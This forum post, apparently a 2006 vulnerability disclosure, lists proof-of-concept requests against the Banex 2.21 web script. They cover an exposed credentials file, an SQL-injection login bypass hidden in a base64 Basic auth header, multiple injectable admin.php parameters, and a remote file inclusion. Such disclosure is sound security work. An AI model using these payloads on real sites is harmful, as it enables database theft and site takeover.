elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [°] [UP] Banex 2.21 Multiples Vulnerabilities
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [°] [UP] Banex 2.21 Multiples Vulnerabilities  (Leído 1,418 veces)
sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
[°] [UP] Banex 2.21 Multiples Vulnerabilities
« en: 29 Julio 2006, 04:28 »

Banex 2.21

Pfff multiples vulnerabilidades.

1.- Sensitive Information Disclosure
Código:
PoC:
http://www.server.com/inc/lib.inc
Contiene la server de la BD, el nombre de usuario y pass, y muchas mas xD

2.- SQL injection
Código:
PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

3.- SQL injection
Código:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*

4.- SQL injection **** AUN CON MAGIC ON ****
Código:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

Mismo bug pero con comilla en contexto SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Mismo bug, en contexto de DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

Remote File Inclusion:
Código:
http://www.server.com/members.php?cfg_root=http://www.google.com/?

Me impresiona que existan estos programas en internet..
la verdad esque los escojo al azar de sourceforge y hotscripts.. y todos tienen algo.. xD

Ma�ana voy por algo mas popular :P

Saludos!!
« Última modificación: 27 Agosto 2006, 19:39 por Sdc » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Container Vulnerabilities
Nivel Web
Troy4no 0 474 Último mensaje 18 Marzo 2017, 16:01
por Troy4no
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines